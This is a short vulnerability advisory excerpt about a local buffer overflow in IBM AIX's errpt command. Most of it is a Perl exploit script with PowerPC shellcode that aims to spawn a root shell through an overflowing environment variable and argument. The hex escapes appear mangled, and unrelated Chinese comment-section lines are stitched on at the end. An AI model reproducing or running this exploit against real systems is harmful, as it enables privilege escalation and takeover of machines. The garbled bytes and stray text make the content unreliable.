source: http://www.securityfocus.com/bid/5885/info
The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.
#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested : on Aix5.1
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-16
# Announce: use as your owner risk!
$BUFF="A". "x7cxa5x2ax79"x500;
#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="x7ex94xa2x79x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb6x05xffxffx7ex94xa2x79";
$BUFF.="x7ex84xa3x78x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb7x05xffxffx38x75xffx04";
$BUFF.="x38x95xffx0cx7ex85xa3x78x90x75xffx0cx92x95xffx10";
$BUFF.="x88x55xfexe1x9ax95xffx0bx4bxffxffxd8/bin/sh";
%ENV=(); $ENV{CC}=$BUFF;
exec "/usr/bin/errpt","-T","A"."x2fxf2x2ax40"x1320;
#EOF
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666